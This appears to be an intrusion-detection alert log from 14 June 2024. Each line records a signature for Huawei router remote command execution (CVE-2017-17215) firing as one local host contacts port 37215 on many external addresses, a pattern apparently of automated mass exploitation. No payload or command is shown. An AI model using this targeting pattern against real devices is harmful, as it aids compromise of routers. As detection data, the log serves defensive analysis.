                                            06/14/24-10:43:34.660337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176637215192.168.2.1441.60.152.249
                                            06/14/24-10:44:20.828278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969837215192.168.2.14156.132.99.156
                                            06/14/24-10:43:41.849050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475637215192.168.2.14197.64.244.2
                                            06/14/24-10:43:45.968096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423837215192.168.2.1441.46.194.184
                                            06/14/24-10:44:14.681308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864437215192.168.2.14156.224.206.255
                                            06/14/24-10:44:31.090906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566037215192.168.2.14156.34.77.151
                                            06/14/24-10:43:36.703102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399837215192.168.2.1441.108.241.16
                                            06/14/24-10:44:35.177469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537037215192.168.2.14197.244.119.123
                                            06/14/24-10:43:36.726303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585837215192.168.2.14197.74.254.110
                                            06/14/24-10:44:20.805037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425637215192.168.2.14197.140.51.232
                                            06/14/24-10:44:20.803338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886037215192.168.2.14197.226.62.130
                                            06/14/24-10:43:58.274323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326237215192.168.2.14156.40.11.21
                                            06/14/24-10:43:34.661329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215037215192.168.2.1441.146.247.111
                                            06/14/24-10:44:22.879972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5996037215192.168.2.14197.174.224.70
                                            06/14/24-10:43:54.203123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585237215192.168.2.1441.8.236.239
                                            06/14/24-10:44:06.452103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348437215192.168.2.14156.139.48.94
                                            06/14/24-10:44:16.732683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242837215192.168.2.14156.68.61.30
                                            06/14/24-10:43:58.274647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697237215192.168.2.1441.217.148.41
                                            06/14/24-10:43:56.243369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499637215192.168.2.1441.42.20.126
                                            06/14/24-10:43:36.726982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347837215192.168.2.14197.14.223.85
                                            06/14/24-10:43:48.034471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030237215192.168.2.14197.139.193.249
                                            06/14/24-10:44:20.805097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805437215192.168.2.14156.190.133.88
                                            06/14/24-10:44:29.024414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052837215192.168.2.14197.219.237.120
                                            06/14/24-10:44:12.640453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3527037215192.168.2.14197.50.10.225
                                            06/14/24-10:44:24.916737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348037215192.168.2.14156.118.166.135
                                            06/14/24-10:43:58.274686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277037215192.168.2.14156.17.154.122
                                            06/14/24-10:44:24.941657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883837215192.168.2.14197.212.170.203
                                            06/14/24-10:44:00.321001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5831237215192.168.2.14156.4.67.164
                                            06/14/24-10:43:54.203146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686437215192.168.2.14197.164.125.180
                                            06/14/24-10:44:06.453004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048837215192.168.2.14156.86.48.127
                                            06/14/24-10:43:39.791011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042837215192.168.2.14156.249.174.206
                                            06/14/24-10:43:43.943209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664837215192.168.2.14197.66.23.255
                                            06/14/24-10:43:58.292491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600037215192.168.2.14197.190.42.222
                                            06/14/24-10:44:29.011987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652637215192.168.2.14156.99.205.209
                                            06/14/24-10:44:06.453723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379637215192.168.2.14197.22.153.169
                                            06/14/24-10:44:16.718444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902037215192.168.2.14156.62.24.87
                                            06/14/24-10:44:04.411239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422237215192.168.2.1441.19.141.34
                                            06/14/24-10:43:48.017476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439237215192.168.2.14156.100.36.153
                                            06/14/24-10:44:12.645929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027637215192.168.2.14156.235.115.171
                                            06/14/24-10:44:22.861589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943237215192.168.2.1441.122.41.78
                                            06/14/24-10:44:10.546053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761237215192.168.2.14197.123.219.26
                                            06/14/24-10:44:16.718780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219437215192.168.2.14156.195.93.158
                                            06/14/24-10:43:58.291953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372037215192.168.2.14197.128.64.3
                                            06/14/24-10:44:08.518603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081437215192.168.2.14156.223.239.117
                                            06/14/24-10:44:20.805529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817237215192.168.2.1441.13.56.152
                                            06/14/24-10:43:37.758947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5608437215192.168.2.14156.236.110.112
                                            06/14/24-10:44:08.517737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341637215192.168.2.14156.111.26.215
                                            06/14/24-10:43:34.663629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388037215192.168.2.1441.103.189.205
                                            06/14/24-10:43:37.760322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320637215192.168.2.1441.250.96.192
                                            06/14/24-10:44:12.624494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765237215192.168.2.1441.222.254.115
                                            06/14/24-10:44:26.999723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483237215192.168.2.14197.245.169.69
                                            06/14/24-10:43:43.972194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115237215192.168.2.14156.142.183.201
                                            06/14/24-10:44:04.419567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525637215192.168.2.14156.77.139.14
                                            06/14/24-10:44:27.000222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349837215192.168.2.14197.244.118.113
                                            06/14/24-10:43:45.991209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336637215192.168.2.14197.146.191.91
                                            06/14/24-10:43:34.676877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.14197.181.204.177
                                            06/14/24-10:43:48.034598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253637215192.168.2.14197.167.18.174
                                            06/14/24-10:44:24.914480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5750037215192.168.2.14197.223.124.211
                                            06/14/24-10:44:24.942817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321037215192.168.2.14156.121.115.136
                                            06/14/24-10:44:26.986209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4670237215192.168.2.14197.42.180.241
                                            06/14/24-10:44:04.407321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425237215192.168.2.14156.249.49.66
                                            06/14/24-10:44:06.470989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663037215192.168.2.1441.104.28.229
                                            06/14/24-10:44:16.715339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856037215192.168.2.14156.163.240.151
                                            06/14/24-10:43:48.034729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529037215192.168.2.1441.223.65.218
                                            06/14/24-10:43:58.290678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5999637215192.168.2.1441.187.45.28
                                            06/14/24-10:44:06.451430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515837215192.168.2.14156.100.48.105
                                            06/14/24-10:43:39.813386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723037215192.168.2.1441.72.184.109
                                            06/14/24-10:43:54.183950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284637215192.168.2.14156.177.96.37
                                            06/14/24-10:44:18.761827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623837215192.168.2.14197.157.84.85
                                            06/14/24-10:43:45.968057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324837215192.168.2.1441.49.175.69
                                            06/14/24-10:43:52.145819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184837215192.168.2.1441.69.47.252
                                            06/14/24-10:44:20.806896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040837215192.168.2.14156.209.5.74
                                            06/14/24-10:43:58.293592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475037215192.168.2.14156.8.199.39
                                            06/14/24-10:44:10.564331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873637215192.168.2.14197.66.35.125
                                            06/14/24-10:44:22.861492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850637215192.168.2.14156.109.161.247
                                            06/14/24-10:44:20.806247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5896637215192.168.2.1441.74.149.75
                                            06/14/24-10:44:26.977705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688037215192.168.2.1441.128.202.42
                                            06/14/24-10:43:58.295598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339237215192.168.2.1441.250.133.148
                                            06/14/24-10:43:34.660617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271437215192.168.2.1441.187.63.243
                                            06/14/24-10:43:43.942635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964437215192.168.2.14156.151.36.129
                                            06/14/24-10:43:41.902425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327637215192.168.2.1441.62.155.68
                                            06/14/24-10:43:43.944056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325637215192.168.2.1441.22.219.81
                                            06/14/24-10:43:56.242688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406837215192.168.2.1441.219.142.117
                                            06/14/24-10:44:14.669446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230237215192.168.2.14156.27.179.142
                                            06/14/24-10:43:36.700803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080637215192.168.2.14197.176.156.206
                                            06/14/24-10:43:54.203056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346637215192.168.2.1441.81.153.79
                                            06/14/24-10:44:18.763918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291037215192.168.2.1441.199.146.40
                                            06/14/24-10:44:18.777458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899837215192.168.2.14156.214.71.152
                                            06/14/24-10:43:56.226270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814837215192.168.2.14197.251.109.148
                                            06/14/24-10:44:08.517331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010637215192.168.2.1441.141.231.209
                                            06/14/24-10:43:39.809955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643837215192.168.2.14197.39.172.85
                                            06/14/24-10:43:36.729850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201837215192.168.2.14197.195.114.208
                                            06/14/24-10:43:48.019184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014037215192.168.2.14197.44.74.228
                                            06/14/24-10:44:18.777185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197837215192.168.2.14197.42.238.230
                                            06/14/24-10:43:41.907077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570237215192.168.2.1441.139.214.131
                                            06/14/24-10:43:36.703953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089237215192.168.2.14197.144.225.45
                                            06/14/24-10:43:54.185866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508237215192.168.2.14197.77.244.165
                                            06/14/24-10:44:14.687577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266037215192.168.2.1441.140.173.1
                                            06/14/24-10:43:50.115825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154637215192.168.2.14156.201.51.223
                                            06/14/24-10:43:34.663169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534437215192.168.2.14156.169.159.36
                                            06/14/24-10:44:18.762384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410637215192.168.2.14197.115.119.231
                                            06/14/24-10:44:10.568295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087237215192.168.2.14197.128.25.224
                                            06/14/24-10:44:33.132119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436637215192.168.2.14156.150.32.75
                                            06/14/24-10:44:16.717658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714237215192.168.2.14197.208.10.62
                                            06/14/24-10:43:34.660818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5111637215192.168.2.14197.115.91.80
                                            06/14/24-10:44:08.519604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861437215192.168.2.14156.96.177.57
                                            06/14/24-10:43:54.185078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166437215192.168.2.1441.27.146.24
                                            06/14/24-10:44:26.976960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985837215192.168.2.14156.208.185.233
                                            06/14/24-10:43:54.186666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500237215192.168.2.14197.127.250.155
                                            06/14/24-10:44:24.935478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353637215192.168.2.14156.0.239.167
                                            06/14/24-10:43:56.243420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459637215192.168.2.1441.175.127.33
                                            06/14/24-10:43:39.791265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5521837215192.168.2.1441.124.229.199
                                            06/14/24-10:43:34.677782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4890037215192.168.2.14156.172.161.20
                                            06/14/24-10:43:41.897944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026237215192.168.2.14197.143.25.209
                                            06/14/24-10:43:56.244271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711037215192.168.2.14197.37.228.248
                                            06/14/24-10:43:52.147006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542837215192.168.2.14197.211.111.178
                                            06/14/24-10:43:41.907254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997837215192.168.2.14197.11.141.39
                                            06/14/24-10:43:43.941619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271837215192.168.2.1441.193.111.250
                                            06/14/24-10:43:39.811604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357637215192.168.2.14156.184.168.68
                                            06/14/24-10:44:24.934385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448037215192.168.2.14197.250.83.177
                                            06/14/24-10:43:56.226473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767837215192.168.2.14156.246.152.201
                                            06/14/24-10:43:41.849191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278837215192.168.2.14156.29.42.180
                                            06/14/24-10:44:33.149967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189637215192.168.2.14197.33.149.80
                                            06/14/24-10:44:24.915343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901237215192.168.2.1441.242.211.54
                                            06/14/24-10:43:43.944816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254837215192.168.2.14197.197.66.137
                                            06/14/24-10:44:08.517283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521437215192.168.2.14197.199.158.222
                                            06/14/24-10:44:12.616576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3923837215192.168.2.14156.169.48.206
                                            06/14/24-10:44:18.776994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256037215192.168.2.14156.40.181.207
                                            06/14/24-10:44:16.732972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924237215192.168.2.14197.242.37.206
                                            06/14/24-10:44:14.671694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515437215192.168.2.14197.153.130.123
                                            06/14/24-10:44:33.152405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047437215192.168.2.14197.177.163.66
                                            06/14/24-10:44:35.182109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5229437215192.168.2.1441.27.253.7
                                            06/14/24-10:44:22.862414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877237215192.168.2.1441.241.239.162
                                            06/14/24-10:43:39.789458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052437215192.168.2.1441.38.218.184
                                            06/14/24-10:44:04.424912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637037215192.168.2.1441.206.47.108
                                            06/14/24-10:44:26.979950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605637215192.168.2.14197.8.122.255
                                            06/14/24-10:44:24.916427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892437215192.168.2.1441.6.36.19
                                            06/14/24-10:44:10.545026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626637215192.168.2.1441.221.254.16
                                            06/14/24-10:44:16.734737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761037215192.168.2.14156.221.159.63
                                            06/14/24-10:43:56.230960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435237215192.168.2.14156.142.239.217
                                            06/14/24-10:43:45.985208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373237215192.168.2.14197.11.217.221
                                            06/14/24-10:43:41.849607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812437215192.168.2.1441.31.222.132
                                            06/14/24-10:43:56.228877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120437215192.168.2.1441.215.103.116
                                            06/14/24-10:44:33.132781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164037215192.168.2.1441.152.67.145
                                            06/14/24-10:43:45.968617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334237215192.168.2.14197.230.19.146
                                            06/14/24-10:43:50.074413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496237215192.168.2.1441.79.109.37
                                            06/14/24-10:43:34.663211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3421237215192.168.2.14156.219.247.62
                                            06/14/24-10:43:36.728780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885837215192.168.2.14197.176.80.91
                                            06/14/24-10:43:56.230087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578837215192.168.2.1441.42.136.43
                                            06/14/24-10:44:06.469711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084437215192.168.2.14197.163.176.166
                                            06/14/24-10:43:50.115936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548837215192.168.2.14156.119.67.140
                                            06/14/24-10:44:29.025201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009237215192.168.2.14197.148.28.0
                                            06/14/24-10:44:20.830691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875637215192.168.2.14197.6.200.102
                                            06/14/24-10:43:56.228418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841437215192.168.2.14156.236.144.64
                                            06/14/24-10:44:16.715716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849237215192.168.2.14156.177.82.28
                                            06/14/24-10:44:31.092268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615437215192.168.2.14197.5.105.227
                                            06/14/24-10:44:26.985613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867437215192.168.2.14156.173.33.68
                                            06/14/24-10:44:31.087247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797837215192.168.2.14197.95.169.214
                                            06/14/24-10:44:22.860301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004637215192.168.2.1441.24.136.246
                                            06/14/24-10:43:50.073530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5202237215192.168.2.14156.208.23.193
                                            06/14/24-10:44:00.324415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541637215192.168.2.1441.122.218.118
                                            06/14/24-10:44:18.761711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059837215192.168.2.14197.167.103.202
                                            06/14/24-10:44:18.779810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192437215192.168.2.14197.160.202.162
                                            06/14/24-10:43:39.812030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686637215192.168.2.14197.68.197.84
                                            06/14/24-10:44:12.616668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720237215192.168.2.14156.86.37.141
                                            06/14/24-10:43:56.243839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4569037215192.168.2.14156.250.227.182
                                            06/14/24-10:43:34.663092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783237215192.168.2.1441.14.203.251
                                            06/14/24-10:43:39.810090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688837215192.168.2.14197.23.251.116
                                            06/14/24-10:44:14.669352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639837215192.168.2.14197.165.51.86
                                            06/14/24-10:44:14.682714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030837215192.168.2.14197.219.136.245
                                            06/14/24-10:44:18.776875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412837215192.168.2.14156.54.34.48
                                            06/14/24-10:44:12.618280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777037215192.168.2.14156.168.127.30
                                            06/14/24-10:44:02.385013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690437215192.168.2.1441.116.129.244
                                            06/14/24-10:43:48.033274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529637215192.168.2.14197.129.172.251
                                            06/14/24-10:43:58.274333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881637215192.168.2.14197.68.10.150
                                            06/14/24-10:44:06.471148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044037215192.168.2.1441.181.100.174
                                            06/14/24-10:44:12.645230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637837215192.168.2.14156.109.169.253
                                            06/14/24-10:44:16.718647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026037215192.168.2.14156.76.59.55
                                            06/14/24-10:43:39.792157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458237215192.168.2.14156.16.234.215
                                            06/14/24-10:44:16.715885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14156.61.18.67
                                            06/14/24-10:44:33.133932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878237215192.168.2.14156.147.251.186
                                            06/14/24-10:43:43.942302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594437215192.168.2.1441.143.51.170
                                            06/14/24-10:43:54.184115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797437215192.168.2.14156.153.97.115
                                            06/14/24-10:43:48.032642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992637215192.168.2.1441.136.240.84
                                            06/14/24-10:44:20.828531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248837215192.168.2.14197.132.202.58
                                            06/14/24-10:44:22.878706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559037215192.168.2.14197.74.215.178
                                            06/14/24-10:43:41.906063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557637215192.168.2.14156.70.132.35
                                            06/14/24-10:44:02.367914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349837215192.168.2.14197.222.121.237
